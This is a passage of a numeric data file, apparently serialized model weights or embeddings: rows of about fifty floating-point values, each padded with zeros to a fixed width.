0.0169424, 1.11406, -0.491598, -0.305924, -0.382736, -0.88252, 0.0358007, -0.924792, 0.628041, -0.655295, 0.249463, 0.48359, 0.217952, -0.0324509, 0.0129095, -0.0178394, -0.502926, -0.305849, -0.941628, -0.57384, -0.206011, -0.739743, 0.531728, -0.0110122, 0.476996, 0.924741, 0.923774, -1.27938, -0.204927, -0.00328265, -1.59904, -0.0433172, 0.106217, -0.159827, -0.437727, -0.657261, 0.380875, -0.750097, -1.65317, 0.745442, 0.0815731, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.609517, -0.177843, -0.033271, -0.167257, 0.141614, -0.395988, -2.17483, -1.06968, -0.657932, -0.334686, 0.340993, 0.283504, -0.0173562, -0.0399413, -1.09367, -0.0470512, 0.565738, -2.7786, -0.361353, -0.00362902, 0.167532, 0.436635, -0.192575, 0.0184835, 0.0358275, 0.433853, 0.0320743, 0.345735, -0.191802, 0.505923, 0.580156, 0.0698568, -0.685144, -1.133, 0.104537, 0.243287, -0.0985993, -0.0112771, -0.466352, 0.359352, 0.215064, -0.0340575, -0.0634264, -0.206534, -0.0144381, 0.527265, 0.514802, -0.041349, 0.388571, 0.343423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0656973, 0.42894, 0.021952, 0.182689, -0.647742, -0.237031, -1.11693, -0.338863, -0.443821, 0.723949, -1.84738, -1.19253, 0.200781, 0.450855, -0.17667, -0.00829342, -1.66793, -0.303494, 0.0997389, -0.669466, -1.14161, -0.166033, -0.0786037, 0.0044661, 0.0202669, 0.675591, 0.0511027, -0.0743772, 0.685487, -0.0735949, 0.0184659, -0.43698, 0.428111, 0.204631, -0.676454, -0.124178, 1.87746, 0.288625, -0.0736747, 0.770818, 0.337971, 0.592075, -0.0406023, 0.077207, 0.336376, 0.573569, 1.03577, -0.229216, -0.70296, 
0.00499674, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0414376, 0.00368568, -0.0192691, -0.0345287, -0.0139882, -0.00555261, -0.0309755, 0.000261231, 0.0107101, -0.0504574, -0.0494216, 0.0317727, -0.0263354, -0.0306606, 0.00537624, 0.01726, -0.041904, -0.00182176, 0.0190573, -0.0556392, -0.050865, -0.0439605, -0.0559331, 0.0388789, -0.0478446, -0.0219769, 0.000390671, -0.0349014, -0.0306691, 0.0357105, 0.0225564, -0.0307099, 0.0127869, 0.000890971, 0.0241678, 0.0275835, 0.0274931, -0.0131301, -0.0293854, 0.0261036, -0.0606141, -0.0506689, 0.0143724, 0.0238213, -0.0297303, 0.002036, 0.0340467, -0.0292854, -0.0179797, -0.0483377, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0113389, 0.604814, 0.00251949, -0.271782, -0.191352, -0.293133, 0.153257, 0.360225, 0.282504, -0.323278, 0.527838, -0.655755, -0.492981, 0.807615, 0.15752, 0.00209674, 0.626342, 0.17061, -0.0537781, 0.86281, 0.294526, 0.0654629, -0.204141, -0.00333945, -0.0109438, 0.280218, -0.517888, 0.0258155, 0.180951, 0.740674, -0.00676968, 0.29065, -0.835604, -0.0200452, -1.38225, -0.165902, 0.0023489, 0.225198, 0.028184, 0.87987, 0.0867377, 0.581448, 0.244987, 0.0863329, 0.0458126, -0.16052, -0.961061, -1.84979, 0.0731202, 0.0282582, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.368695, 0.263083, 0.140912, -0.327789, -0.0368086, -0.11641, 0.0612997, 0.1356, 0.848766, 0.058811, -1.10532, 
0.39424, 0.0617332, 0.47155, -0.743006, 0.0363225, -1.37475, -0.254104, -0.250116, -0.427303, -0.07486, 2.09467, -0.41261, 0.0206808, -0.0200387, -2.70812, 0.373432, 0.0599537, -0.642167, -0.176551, 0.187799, -0.0861577, 0.411067, -0.0165315, -6.5173e-05, -0.0663925, 1.17456, -0.51202, 0.135414, 0.185266, -0.0777025, -1.49654, 0.721455, -0.0701605, -0.275571, -0.161102, 1.61876, 0.485306, -0.0519263, 0.0975666, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.319624, 1.55082, 0.229315, -1.20844, 0.0206282, 0.0808243, 0.118085, -0.810775, 0.0250333, -0.215429, 1.19483, 0.499759, -0.837816, -0.28498, -0.0056145, -0.00992754, 0.708286, 0.813682, 0.966016, 0.549447, -0.468758, 0.220178, 0.111147, 0.0121496, -0.0341207, -0.0815913, -0.162864, -0.270638, 0.581463, -0.121412, 0.207404, -0.404903, 0.759158, 0.273773, -0.936182, 0.0461429, -0.589076, -0.158522, -0.0165169, 0.810663, -0.00962627, 2.10891, -1.08988, 0.39727, -0.27216, -3.31289, -0.0196586, 0.70175, -0.110245, -0.24569, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.122607, 0.394524, -0.314113, -0.00619769, 0.711275, -0.0823144, -0.482402, -2.48933, -0.870596, 0.0181258, -1.10754, -0.526174, -0.242918, 0.5181, 0.0557912, 0.0454726, 0.0855753, -1.48645, 0.343221, -0.537091, -0.644581, 0.146458, -0.0243296, -0.0462997, 0.03226, -1.62043, 0.137981, 1.60083, -1.52357, 0.392864, 0.251254, 0.580318, 1.20224, -1.21149, -1.26633, -2.39168, 2.02772, 0.115325, -0.199669, 1.12908, 0.297942, -0.597661, -1.30359, -0.920368, 0.591552, -2.55962, -1.3459, 1.32661, 0.211996, -0.142341, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0156274, 0.0168518, -0.0230844, -0.0579289, -0.0560536, -0.0409155, -0.0126873, -0.0357573, 0.0366471, 0.0106708, 0.0359433, -0.0112173, -0.0188018, -0.00436176, -0.0289048, -0.0159432, 0.0290383, 0.039863, -0.043133, 0.0392535, -0.0122079, 0.034629, -0.0204436, -0.0281258, 0.00718058, -0.0310906, -0.0250631, 0.0155047, -0.00733336, 0.0135802, 0.0210936, 0.0334198, -0.00472475, -0.0240138, -0.0265337, 0.00934959, 0.01106, -0.0484832, -0.0139009, 0.000895336, -0.0292063, -0.0457798, -0.0217811, 0.0191885, -0.0060496, 0.0213942, -0.0480005, -0.00345817, -0.00183496, 0.00954576, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.30402, 0.626339, 0.0552874, -0.268339, 0.15172, 0.164563, 0.87601, 0.819321, 0.540492, 0.339196, -0.496015, 0.352337, 0.0857369, -1.52285, -0.571385, 0.0302344, -1.30673, 0.89297, -0.587058, -1.18263, -0.201872, 1.35521, 0.254507, -0.00741729, -0.0143483, 0.491481, 0.321675, 0.266766, 0.641303, 0.0427328, 0.133116, -0.186202, -0.128464, -0.0482698, 0.0386627, 1.12985, -0.245704, 0.255579, -0.153309, -0.309185, 0.384614, 0.529026, -0.136027, -0.149134, -0.479501, -0.135705, 1.15677, 0.744923, 0.667122, -0.400556, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.11264, -0.191974, -0.0486374, -0.414322, -1.09569, 0.874824, -0.962628, 1.05673, 0.2164, -1.64585, 0.625732, 0.054045, -2.29822, -0.141679, -1.06724, -0.0268634, 
-0.151942, 0.187875, 0.213262, 0.0731845, -0.148585, -0.362837, -0.376127, -0.00460273, -0.00749795, -2.94721, 1.04731, 0.116199, 1.82704, -0.649764, -0.488225, -0.493207, -1.68811, -0.345315, 1.75317, 0.684938, -1.41104, 0.843098, -0.037797, -0.630935, -0.298131, 0.299646, 0.476681, -0.411436, -1.42993, 0.266032, -3.33751, -2.60804, -0.567104, 0.809038, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.924685, -1.69476, -0.0256847, -1.6155, -0.138748, 0.526928, -0.0627263, 0.0319344, -0.583238, 0.479487, -1.33356, -0.686037, -1.24445, 0.592074, -0.656349, 0.0181061, -0.879366, 1.58465, -0.268623, -0.64867, -0.248281, 0.00207757, 0.175082, 0.0393948, -0.0313731, 0.458929, 0.00457807, -0.315914, 1.23199, 0.0671696, 0.143879, 0.531725, -0.30002, -0.0317503, -1.77664, -0.178742, 1.78787, 0.183242, 0.0837026, -0.509367, 0.136983, -0.492983, -0.232635, -0.0970851, -0.111253, 1.21521, 1.03742, 0.532422, 1.46487, 0.129427, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.862811, -0.670008, -1.37987, -0.109881, 0.0747215, 0.720224, -0.0325526, -0.145169, -0.350966, -0.194082, 0.692988, -0.795648, 0.340393, -0.435768, 0.124802, 0.0377229, -0.925762, -0.045185, 0.15111, 0.117047, 0.0623455, 0.475161, -0.195921, 0.0245318, -0.026756, -0.235258, 0.10174, 0.487501, 0.0568525, 0.949231, -0.9967, -1.03949, 1.20506, 0.0508084, 0.0144275, -0.874393, -0.132608, 0.0960484, -2.87336, -1.79127, 0.0882902, 0.0465161, -0.0430049, 0.570457, 0.6819, 0.305011, -1.17411, -0.142216, 0.0451093, 0.541226, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00148601, -0.00357013, -0.0616925, -0.0636764, 0.0247695, -0.0304841, -0.0441116, 0.00903143, -0.0222439, 0.0112654, -0.0229218, -0.0373045, -0.0050473, -0.0279536, 0.0173872, 0.0393649, 0.011608, -0.0437569, -0.0403116, -0.0562019, 0.0298804, 0.00430499, 0.0257676, 0.0146079, -0.0186624, 0.0259071, 0.0124396, 0.0303811, -0.0229133, -0.0460154, 0.0273132, -0.0527346, 0.0388513, -0.00536339, -0.0109783, -0.0371028, -0.0028464, -0.0663156, -0.045411, -0.0462137, -0.0033154, -0.0365228, 0.0291231, -0.0246833, -0.0277126, 0.00548551, -0.0176978, 0.0258907, -0.0413788, 0.0121408, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.78534, -0.059711, -0.000766731, 0.921483, -0.709602, 0.380256, 0.194282, 0.00413015, -2.65517, 0.668865, -0.271555, -0.145263, 0.297035, 0.948821, -1.81939, 0.0420457, -0.977775, -0.0752278, -0.325641, -0.414047, -1.11357, -0.369069, -0.0641627, 0.0450483, 0.0367067, -0.0664357, 0.674046, -0.109957, 1.51405, -0.990457, 0.546237, 0.210234, 0.0236006, 0.807868, -1.50949, 0.298036, -1.76316, 0.124708, -0.822992, -0.135506, 0.058422, -2.55649, -0.167629, 0.304168, 1.11131, -5.61323, 0.315244, -0.0748288, -0.604054, 1.01662, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0187562, -0.033321, -0.0381534, 0.0162084, -0.0362454, -0.0332758, 0.00157786, 0.0133417, -0.019265, 0.0137116, 0.0424212, -0.0129916, -0.0546914, -0.0207646, -0.0292256, -0.0308969, 0.0133515, -0.0334743, 0.00750258, 
0.00400925, -0.00160565, -0.0397202, -0.0434836, 0.0100943, -0.0101321, 0.000216635, -0.0440908, -0.045878, 0.0240436, -0.00757035, -0.0203618, 0.0146069, 0.00367429, -0.029869, 0.0224676, -0.00470809, -0.0244964, -0.0455441, -0.0125318, -0.00157622, -0.0319749, -0.0180606, -0.0063315, 0.00583772, 0.0311452, -0.000495937, -0.0440696, 0.0436874, 0.0142928, 0.0261217, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.953141, -1.71866, -1.83983, -0.0186287, -0.0108845, 0.117798, 0.0828269, -0.836869, -0.0901551, -0.147973, 0.525239, -0.685936, -0.678019, 0.306611, -0.347638, -0.00513682, 0.822991, -0.341358, 0.887914, -0.731914, -0.0304687, -1.10387, 0.363775, -0.0290053, 0.00713952, 0.167939, 0.296245, -0.291795, -0.591269, -0.0627268, -0.494668, 0.0946488, 1.50354, 0.534049, -0.0262355, 0.0913687, -0.131227, 0.46155, -1.27119, -1.40876, 0.226335, 0.832614, 0.585714, -1.1919, -0.15921, -0.27747, 0.102021, -0.13363, -0.0323088, 0.497007, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.2521, 2.07829, -0.0329299, -0.319502, 0.398989, 0.039076, -1.10795, -0.443853, -0.0610469, 0.14882, -0.959466, -0.373463, -0.306637, -0.134118, 0.584793, -0.0452735, 0.0619634, 0.558684, 0.0890687, -0.112625, 0.617972, -0.920084, -0.234827, 0.0129866, 0.0111995, -0.0011833, -0.649588, 2.71724, -0.51884, -0.805562, 0.420988, 0.252446, 0.765109, -1.1996, 1.05707, -1.71301, -0.17782, 0.280743, -0.292837, -0.944582, -0.0642112, -0.801893, -1.06214, 0.0772809, 0.234639, 0.99623, -0.282232, 2.29765, -2.0628, -0.369362, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.582439, 0.832878, -0.628175, -0.103516, -0.00012316, 0.316154, -0.26108, 0.0305011, 0.212839, 0.183509, -0.307016, -0.29067, -0.11557, -0.185324, -0.0989584, 0.0396352, 0.13184, 0.198769, -0.196362, 0.0995212, -0.291282, 1.17858, 0.134234, 0.048321, 0.0367209, 0.205507, 0.368398, 1.21318, -0.185465, 0.178056, 0.185864, 0.0590555, -0.0998919, -0.211, 0.215657, 0.331866, -0.166343, -0.0286584, -0.0261148, 0.256146, 0.183969, -0.353116, 1.1167, -0.0611925, -0.0252538, 0.342589, 0.124633, -0.24947, 0.321963, 0.822282, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.136892, 0.0721447, -0.259287, -0.0208208, -0.150657, -0.0895253, 0.0245684, -0.0341342, -0.12217, -0.0638194, -0.0282255, -0.199508, -0.0666232, 0.0329192, -0.097983, 0.0476624, 0.0698389, -0.0434745, 0.047505, -0.105288, 0.00866304, 0.0507566, 0.0317675, 0.0456378, -0.0355532, 0.0265718, 0.0790676, 0.0372404, 0.0998752, 0.0470625, 0.0201793, -0.0482221, 0.0617173, -0.0301293, 0.0471854, 0.0880959, -0.0627413, -0.0514169, -0.0115459, -0.0172184, -0.0297773, 0.0544937, 0.0215543, 0.0896598, 0.00351407, 0.119885, -0.0481029, -0.0745631, 0.0316946, 0.00437533, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.582286, -0.110757, 0.215679, -0.0994347, 0.291611, 0.792005, -2.64376, 0.133335, 0.0345007, -0.546771, -1.5891, -0.588209, 0.133503, -1.36478, 0.0448261, 0.00432367, 1.96065, -0.341599, 0.904003, -1.37234, 0.215873, 
-2.43843, -0.384582, 0.0185384, -0.0453791, 0.91527, -0.551158, 0.41838, 0.467866, 0.198787, -0.60859, 0.382509, -0.378152, 0.66569, -0.0523714, 0.049119, 0.223137, -0.410575, 0.900935, 0.872933, -0.230819, 0.963895, -0.0629918, 0.238003, 0.0529725, 0.424931, -0.251649, -1.05977, -2.00609, 0.540805, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.785965, -0.271735, -0.405375, 0.159904, -0.842578, 0.337405, 0.111826, -0.0151781, -0.138691, 0.422929, -0.306801, 0.0784142, -0.393566, 0.207184, 0.21136, 0.00340884, -0.46877, 0.123268, -0.0601133, 0.688706, -0.266501, 0.185157, 0.0704262, -0.0182847, -0.0201253, 0.551132, -0.650357, -0.628632, 0.758445, -0.636277, -0.608634, -0.0163685, -0.240027, 1.07946, -0.546335, 0.448533, 0.376862, 0.655255, 0.174317, -0.354294, -0.232278, 0.116388, -0.332993, -0.578722, 0.209091, -0.578318, 0.451814, 0.931644, 0.108932, 0.0911851, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.65823, -0.776449, -0.0138354, -0.183888, 0.563507, 0.248737, 0.655927, 0.719709, 0.194328, -0.119841, -0.143374, 0.231831, 0.248526, -0.599032, 0.182668, -0.0133104, -0.10328, -0.160372, 0.261886, -0.588056, 0.257225, -0.716549, -0.227665, -0.00740986, 0.0392912, 0.501854, -0.246226, -0.630082, -0.000497745, -0.227172, -0.386701, 0.0433633, 0.495595, 0.724143, -0.555112, 0.365661, 0.643484, -0.0611116, 0.164031, 0.255418, -0.224586, -0.0591111, -0.301646, -0.620003, 0.207101, -0.0112214, 0.327933, 1.04446, -0.256591, 0.59388, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.334011, 0.404652, -0.461713, 0.0216312, 0.0224788, 0.580186, 0.0162693, 0.130441, -0.336561, 0.0898612, 0.789693, 0.802602, -0.0485138, -0.497132, -0.132076, -0.000658427, 0.389836, -0.104748, -0.145367, -0.178632, 0.478789, -0.0159836, 0.20124, -0.0382066, -0.00511412, 0.376309, 0.229704, 0.320189, -0.260227, -0.114185, -0.0672746, -0.240187, -0.699651, 0.62902, -0.380714, 0.110032, -0.559745, 0.67688, 1.25499, -0.372185, -0.633603, 0.413567, 0.228946, 0.747292, -0.212495, -0.782072, 0.0701209, 0.717564, -0.0537419, 0.278422, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.358666, -0.208551, -0.258723, 0.111306, 0.0596215, -0.454309, 0.182454, -0.822783, -0.686008, 0.744587, -2.17534, -0.418214, -0.122385, 1.37504, 0.485839, 0.00550466, -0.442638, 0.191347, 0.124359, -0.216777, -0.813155, 0.813936, -0.0926275, 0.0294841, -0.0234788, 0.851044, -0.310646, 0.79908, -1.18137, -0.00794804, 0.0994801, 0.951671, -0.266743, -0.281261, -0.384125, 0.0802083, 1.5333, 0.319695, 0.0711581, 0.851254, 0.633829, -1.07175, 0.249073, -0.190516, 0.48662, 0.435457, 2.38577, 1.61199, 0.342093, 0.0657524, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.949052, 0.695792, -0.515945, -0.190663, 0.732786, -2.00262, -0.541661, -0.434883, 0.386486, 0.255857, 2.27304, -0.902119, -0.631274, 1.41158, -0.579462, 0.0111682, -0.152015, 0.302815, -0.725427, 0.218533, 0.494471, -0.378959, 0.339985, -0.0483479, 0.0428619, -1.3584, -0.608176, 0.122778, 0.424364, 
0.525906, 0.564177, 0.650813, -0.416894, -0.286998, 1.30127, -3.0729, -0.713153, -0.970438, -0.0178851, 0.471966, -0.0416125, -0.83092, -0.836537, -1.10521, -0.383623, -1.39014, -2.8078, -1.93634, 0.851692, -0.166098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.516101, 0.551045, 0.929613, -0.414174, 0.452648, 0.896511, -0.652702, 0.831842, 0.827391, 0.220768, 0.464701, 0.401416, 0.240852, -0.279534, -0.267248, -0.00641088, 0.938662, 0.415578, 0.0569916, 0.0866695, 0.997541, -0.624842, -0.516517, -0.0493841, 0.00188086, 1.31533, -0.221167, -1.73544, 0.449714, -0.0668909, -0.0353895, 0.586362, 0.0386839, 0.266589, 0.189778, -0.0126351, -0.854402, 1.08884, 0.163547, -0.134133, -0.12194, 0.335531, 0.62834, 0.0129163, -0.295834, 